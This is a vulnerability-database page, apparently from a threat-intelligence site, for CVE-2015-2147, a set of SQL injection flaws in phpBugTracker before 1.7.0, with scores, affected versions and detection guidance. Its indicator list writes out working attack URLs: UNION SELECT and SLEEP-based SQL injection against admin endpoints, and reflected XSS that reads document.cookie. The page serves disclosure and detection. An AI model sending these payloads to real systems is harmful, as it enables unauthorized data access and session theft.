cbcvebase.
CVE-2015-2147
published 2017-10-06

CVE-2015-2147: Multiple SQL injection vulnerabilities in Issuetracker phpBugTracker before 1.7.0 allow remote attackers to execute arbitrary SQL commands via unspecified…

PriorityP262critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
1.59%
72.7th percentile
Multiple SQL injection vulnerabilities in Issuetracker phpBugTracker before 1.7.0 allow remote attackers to execute arbitrary SQL commands via unspecified parameters.

Affected

1 ranges
VendorProductVersion rangeFixed in
phpbugtracker_projectphpbugtracker<= 1.6.0

Detection & IOCsextracted from sources · hover to see the quote

urlhttp://{TARGET}/admin/project.php?op=edit_component&id=1%27+and+1=2+union+select+1,2,database%28%29,user%28%29,5,6,version%28%29,8,9,10,11,12+--+
urlhttp://{TARGET}/admin/group.php?op=edit&use_js=1&group_id=1+and+SLEEP%2810%29+--+
urlhttp://{TARGET}/admin/group.php?op=edit-role&use_js=1&group_id=8+and+substring%28version%28%29,1,1%29=5+--+
urlhttp://{TARGET}/admin/status.php?op=edit&status_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29,5+--+
urlhttp://{TARGET}/admin/database.php?op=edit&database_id=1%27+and+1=2+union+select+1,user%28%29,version%28%29+--+
urlhttp://{TARGET}/admin/site.php?op=edit&site_id=5%27+and+1=2+union+select+1,version%28%29,database%28%29+--+
urlhttp://{TARGET}/bug.php?op=add&project=1%27+and+1=2+union+select+user%28%29+--+
urlhttp://{TARGET}/admin/user.php?op=edit&use_js=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&user_id=1
urlhttp://{TARGET}/admin/group.php?op=edit&use_js=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&group_id=1
path/admin/project.php
path/admin/group.php
path/admin/status.php
path/admin/database.php
path/admin/site.php
path/bug.php
path/admin/user.php
path/admin/os.php
  • Detect SQL injection attempts against phpBugTracker admin endpoints by monitoring for UNION SELECT payloads in query parameters: id, status_id, database_id, site_id, group_id, and project.
  • Detect blind SQL injection via time-based SLEEP() payloads in the group_id parameter of /admin/group.php.
  • Detect reflected XSS attempts in the use_js parameter of /admin/user.php and /admin/group.php, looking for script tag injection patterns such as %3Cscript%3E.
  • Monitor GET requests to phpBugTracker admin paths (/admin/project.php, /admin/group.php, /admin/status.php, /admin/database.php, /admin/site.php, /admin/user.php, /admin/os.php, /bug.php) for SQL metacharacters (single quotes, UNION, SELECT, SLEEP, substring) in query string parameters.
  • The bug.php SQLi via the project parameter was previously assigned CVE-2004-1519, indicating a long-standing unpatched injection point; treat any UNION SELECT in /bug.php?op=add&project= as high-confidence exploitation.
  • ·All attack URLs use {TARGET} as a placeholder; replace with the actual host when deploying detection signatures.
  • ·Multiple vulnerability classes are present (SQLi, stored XSS, reflected XSS, CSRF); detection rules should be scoped per vulnerability type to avoid false-positive overlap.

CVSS provenance

nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.